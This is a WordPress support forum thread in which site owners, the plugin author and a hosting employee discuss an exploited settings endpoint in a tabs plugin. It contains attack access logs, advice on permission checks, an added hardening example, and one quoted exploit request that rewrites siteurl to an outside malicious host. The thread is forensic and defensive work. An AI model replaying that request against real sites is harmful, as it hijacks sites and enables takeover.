Title: Security Checking
Last modified: December 9, 2021

---

# Security Checking

 *  Resolved [hangar1337](https://wordpress.org/support/users/hangar1337/)
 * (@hangar1337)
 * [4 years, 5 months ago](https://wordpress.org/support/topic/security-checking/)
 * Hi Oxilab Team,
 * Someone has succeeded in changing the account creation settings of one of my WordPress sites
   (checkbox “Registration” and “Default role for any new account”) and then created
   an administrator account. It turns out that this person, just before creating
   the account, called your API, and only that one, with the POST method. Could you confirm
   to me that there is not a possible breach on your side?
 * Thanks a lot
 *     ```
       46.39.80.197 - - [09/Dec/2021:13:37:43 +0000] "POST /wp-json/oxilabtabsultimate/v1/oxi_settings HTTP/1.1" 200 543 "https://www.xxxxx.xxx:443/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3538.77 Safari/537.36"
       46.39.80.197 - - [09/Dec/2021:13:37:43 +0000] "POST /wp-json/oxilabtabsultimate/v1/oxi_settings HTTP/1.1" 200 543 "https://www.xxxxx.xxx:443/wp-json/oxilabtabsultimate/v1/oxi_settings" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3538.77 Safari/537.36"
       46.39.80.197 - - [09/Dec/2021:13:37:44 +0000] "GET /wp-login.php?action=register HTTP/1.1" 200 2055 "https://www.xxxxx.xxx:443/wp-json/oxilabtabsultimate/v1/oxi_settings" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3538.77 Safari/537.36"
       46.39.80.197 - - [09/Dec/2021:13:37:45 +0000] "POST /wp-login.php?action=register HTTP/1.1" 302 442 "https://www.xxxxx.xxx:443/wp-login.php?action=register" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3538.77 Safari/537.36"
       46.39.80.197 - - [09/Dec/2021:13:37:47 +0000] "GET /wp-login.php?checkemail=registered HTTP/1.1" 302 224 "https://www.xxxxx.xxx:443/wp-login.php?action=register" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3538.77 Safari/537.36"
       46.39.80.197 - - [09/Dec/2021:13:37:47 +0000] "GET /not_found HTTP/1.1" 404 67873 "https://www.xxxxx.xxx:443/wp-login.php?action=register" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3538.77 Safari/537.36"
       ```
   

Viewing 9 replies - 1 through 9 (of 9 total)

 *  Plugin Author [biplob018](https://wordpress.org/support/users/biplob018/)
 * (@biplob018)
 * [4 years, 5 months ago](https://wordpress.org/support/topic/security-checking/#post-15148336)
 * As for the code you mention, that can’t work with my plugin. I always use security with
   any POST or GET request.
 * Someone tried to get into your website, as they submitted some requests with my plugin
   also, but those can’t pass the WordPress nonce at the REST API.
 *  Thread Starter [hangar1337](https://wordpress.org/support/users/hangar1337/)
 * (@hangar1337)
 * [4 years, 5 months ago](https://wordpress.org/support/topic/security-checking/#post-15148381)
 * Thanks for the quick fix! 🙂
 *  Thread Starter [hangar1337](https://wordpress.org/support/users/hangar1337/)
 * (@hangar1337)
 * [4 years, 5 months ago](https://wordpress.org/support/topic/security-checking/#post-15148525)
 * If I understand you, the release of version 3.5.4 with the following correction
   1 hour ago is therefore unrelated …
 * [https://github.com/MrOxizen/vc-tabs/commit/60fb94d46579f923436e5b8fbf2ba9044835dc24#diff-c862cc5aaff4434be8071dcede9d73ec1f8138d168e74f66805a04bf92160122](https://github.com/MrOxizen/vc-tabs/commit/60fb94d46579f923436e5b8fbf2ba9044835dc24#diff-c862cc5aaff4434be8071dcede9d73ec1f8138d168e74f66805a04bf92160122)
 * The fix is, however, on the WordPress nonce. It’s not fair.
 *  Plugin Author [biplob018](https://wordpress.org/support/users/biplob018/)
 * (@biplob018)
 * [4 years, 5 months ago](https://wordpress.org/support/topic/security-checking/#post-15148566)
 * Before this update, I used a header nonce with a header request. For more stability
   I added an AJAX format to make it more stable.
 * Thank you very much for sharing the issues, so I can make my plugin more stable.
   I am just concerned about my plugin not hitting you at all. Hope you understand.
 *  [itsec007](https://wordpress.org/support/users/itsec007/)
 * (@itsec007)
 * [4 years, 5 months ago](https://wordpress.org/support/topic/security-checking/#post-15156072)
 * Hi
 * I was also hacked through this path; an admin account was registered and the
   plugin was loaded as a backdoor.
 * [@biplob018](https://wordpress.org/support/users/biplob018/) Which plugin is
   using the path /wp-json/oxilabtabsultimate/v1/oxi_settings? Only the plugin “Tabs –
   Responsive Tabs with WooCommerce”?
 * [@hangar1337](https://wordpress.org/support/users/hangar1337/) Check your server
   for a wp-cache.php file. This is a loaded backdoor.
 *  Thread Starter [hangar1337](https://wordpress.org/support/users/hangar1337/)
 * (@hangar1337)
 * [4 years, 5 months ago](https://wordpress.org/support/topic/security-checking/#post-15158260)
 * Hi [@itsec007](https://wordpress.org/support/users/itsec007/)
 * Thanks for sharing. I am using Docker and Composer to build the WordPress site.
   I rebuilt and redeployed a new image after the fix. I found some information about
   async actions with “Action Scheduler” in the database. It should be seriously considered
   that the database has been copied…
 *  [Antony Booker](https://wordpress.org/support/users/antonynz/)
 * (@antonynz)
 * [4 years, 5 months ago](https://wordpress.org/support/topic/security-checking/#post-15178796)
 * [@biplob018](https://wordpress.org/support/users/biplob018/) Thanks for patching
   this quickly.
 * I noticed there are some capability checks in the permission_callback added to
   deal with this that I’d recommend reworking.
 * The plugin now has an option for changing the role of the user that has permission
   to edit the plugin’s settings. However, the `get_permissions_check` function grants
   permission based on the first key in the capability array for the role rather
   than against the user role selected in the plugin options.
 * The original vulnerability would still be possible for any user with the same
   capability. For example, if Shop Manager was chosen as a role that could update
   the plugin’s settings, they would be able to update any admin options and potentially
   gain admin access.
 * I’d recommend changing `get_permissions_check` to check for the `manage_options`
   capability only, so only admins can update the settings. For further protection
   you could whitelist/hardcode the options that are updated.
 * I’d also check that any input fields used by the plugin escape data before outputting
   it to the user, to prevent XSS attacks.
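What the previous reply recommends, written out as an added example that is not the plugin's own code: a REST route whose `permission_callback` requires `manage_options` regardless of any role configured in plugin settings, plus a hardcoded allow-list of the options the endpoint may write. The namespace and route are the ones named in this thread; the option names `oxi_example_tab_style` and `oxi_example_tab_count` and all function names are assumptions made for the example.

```php
<?php
// Added example, not the plugin's code. It hardens a settings endpoint the way
// the reply above recommends: an admin-only permission check plus an option allow-list.
// The namespace and route come from this thread; option and function names are assumed.

add_action('rest_api_init', function () {
    register_rest_route('oxilabtabsultimate/v1', '/oxi_settings', [
        'methods'             => WP_REST_Server::CREATABLE,
        'callback'            => 'oxi_example_update_setting',
        // Runs before the callback; returning false or a WP_Error rejects the request.
        'permission_callback' => 'oxi_example_can_manage_settings',
        'args'                => [
            'name'  => [
                'type'              => 'string',
                'required'          => true,
                'sanitize_callback' => 'sanitize_key',
            ],
            'value' => [
                'type'     => 'string',
                'required' => true,
            ],
        ],
    ]);
});

/**
 * Only users holding manage_options (administrators on a single site) may write
 * settings, whichever role the plugin's own options select. With cookie
 * authentication WordPress only populates the current user when the X-WP-Nonce
 * header carries a valid wp_rest nonce, so an anonymous caller fails this check too.
 */
function oxi_example_can_manage_settings(WP_REST_Request $request) {
    if (!current_user_can('manage_options')) {
        return new WP_Error(
            'rest_forbidden',
            'Sorry, you are not allowed to change these settings.',
            ['status' => rest_authorization_required_code()]
        );
    }
    return true;
}

// Hardcoded allow-list: option name => sanitizer. Core options such as siteurl,
// users_can_register and default_role are deliberately absent, so a request naming
// one of them is rejected before update_option() is ever reached.
const OXI_EXAMPLE_ALLOWED_OPTIONS = [
    'oxi_example_tab_style' => 'sanitize_text_field', // assumed option name
    'oxi_example_tab_count' => 'absint',              // assumed option name
];

function oxi_example_update_setting(WP_REST_Request $request) {
    $name  = $request->get_param('name');
    $value = $request->get_param('value');

    if (!array_key_exists($name, OXI_EXAMPLE_ALLOWED_OPTIONS)) {
        return new WP_Error(
            'rest_invalid_param',
            'This option cannot be changed through this endpoint.',
            ['status' => 400]
        );
    }

    // Sanitize with the function registered for this specific option.
    $sanitizer = OXI_EXAMPLE_ALLOWED_OPTIONS[$name];
    $clean     = $sanitizer($value);
    update_option($name, $clean);

    return rest_ensure_response(['name' => $name, 'value' => $clean]);
}
```

Two design points worth noting. The permission check is deliberately not tied to a role chosen in plugin settings: roles are bundles of capabilities, and any role granted access to this endpoint could otherwise be used to reach core options. The allow-list is a second, independent gate, so even an administrator session cannot be driven into rewriting `siteurl` or `users_can_register` through this route; if a later audit finds an authentication bug, the damage is bounded by the listed options.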
 *  [tigertech](https://wordpress.org/support/users/tigertech/)
 * (@tigertech)
 * [4 years, 5 months ago](https://wordpress.org/support/topic/security-checking/#post-15181804)
 * Just as a followup to this, I work for a hosting company, and one of our customer
   sites was also hacked via this vulnerability yesterday. We use mod_security logging
   for forensics, so I can tell you the exact request used to do it:
 * `POST /wp-json//oxilabtabsultimate/v1/oxi_settings HTTP/1.1`
 * Post data:
 * `rawdata={"name":"siteurl","value":"https://line.storerightdesicion.com/ping/?track.js"}`
 * Hopefully that helps you (the author) ensure that the vulnerability is patched.
 *  [revivalyth](https://wordpress.org/support/users/revivalyth/)
 * (@revivalyth)
 * [4 years, 5 months ago](https://wordpress.org/support/topic/security-checking/#post-15182241)
 * [@biplob018](https://wordpress.org/support/users/biplob018/) A few of our clients
   that use this plugin were affected today. Same issue [@tigertech](https://wordpress.org/support/users/tigertech/)
   mentioned.


The topic ‘Security Checking’ is closed to new replies.


 * 10 replies
 * 6 participants
 * Last reply from: [revivalyth](https://wordpress.org/support/users/revivalyth/)
 * Last activity: [4 years, 5 months ago](https://wordpress.org/support/topic/security-checking/#post-15182241)
 * Status: resolved